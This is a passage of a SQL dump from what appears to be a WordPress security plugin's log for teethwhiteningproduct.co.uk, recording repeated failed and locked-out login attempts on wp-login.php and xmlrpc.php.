Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6977,1629285128.551848,1629285128.478100,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6978,1629285128.041569,1629285127.959200,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6979,0.000000,1629285301.461107,'\0\0\0\0\0\0\0\0\0\0����!',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6980,1629285302.919458,1629285302.847300,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6981,1629285302.436853,1629285302.326100,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6982,1629285376.847647,1629285376.776600,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6983,1629285376.290565,1629285376.205900,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6984,0.000000,1629285662.127184,'\0\0\0\0\0\0\0\0\0\0����؛',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6985,1629285754.322898,1629285754.253000,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6986,1629285753.904502,1629285753.780000,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6987,0.000000,1629286002.573083,'\0\0\0\0\0\0\0\0\0\0���@u�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6988,1629286106.756059,1629286106.687300,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6989,1629286106.285841,1629286106.191000,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6990,0.000000,1629286352.054078,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6991,1629286568.105298,1629286567.993400,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6992,1629286567.468052,1629286567.386800,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6993,1629286409.004704,1629286408.934700,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6994,1629286408.500847,1629286408.420100,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6995,0.000000,1629286713.442062,'\0\0\0\0\0\0\0\0\0\0���#t;',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6996,1629287055.532348,1629287055.420900,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6997,1629287055.053238,1629287054.970600,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(6998,1629286872.179375,1629286872.107400,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(6999,1629286871.724676,1629286871.414200,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7000,1629287118.651634,1629287118.581000,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7001,1629287118.181556,1629287118.067100,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7002,0.000000,1629287129.734024,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7003,1629287233.204574,1629287233.092800,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7004,1629287232.707394,1629287232.628300,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7005,1629287436.596116,1629287436.485900,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7006,1629287434.692954,1629287434.611400,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7007,0.000000,1629287512.631084,'\0\0\0\0\0\0\0\0\0\0����zX',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7008,1629287544.923509,1629287544.688300,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7009,1629287544.356775,1629287543.757400,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7010,1629287610.186882,1629287610.114700,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7011,1629287609.786311,1629287609.703300,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7012,0.000000,1629287868.157507,'\0\0\0\0\0\0\0\0\0\0��gzj�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7013,1629288373.901861,1629288373.831100,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7014,1629288373.308404,1629288373.194700,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7015,1629288496.761131,1629288496.691400,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7016,1629288496.085160,1629288496.014100,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7017,1629288913.364758,1629288913.294400,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7018,1629288912.931591,1629288912.427500,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7019,1629289022.608144,1629289022.531300,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7020,1629289022.102560,1629289022.022600,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7021,0.000000,1629289031.073316,'\0\0\0\0\0\0\0\0\0\0���KG�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7022,1629289153.583157,1629289153.469300,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7023,1629289150.579503,1629289150.466200,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7024,1629289398.922086,1629289398.844800,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7025,1629289398.327667,1629289398.246100,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7026,0.000000,1629289409.102972,'\0\0\0\0\0\0\0\0\0\0���@u�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7027,1629289521.590366,1629289521.518700,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7028,1629289521.143834,1629289521.061200,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7029,1629289714.808407,1629289714.696700,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7030,1629289714.164373,1629289714.084800,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7031,0.000000,1629289769.562392,'\0\0\0\0\0\0\0\0\0\0��^��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7032,1629290077.796047,1629290077.680300,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7033,1629290077.135077,1629290077.021700,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7034,1629289992.254632,1629289992.122100,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7035,1629289991.755515,1629289991.674700,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3htbHJwYy5waHA=\"}'),(7036,1629289789.377998,1629289789.297700,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'teethwhiteningproduct\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7037,1629289788.680024,1629289788.599300,'\0\0\0\0\0\0\0\0\0\0��N��',0,503,0,0,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php',NULL,'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: 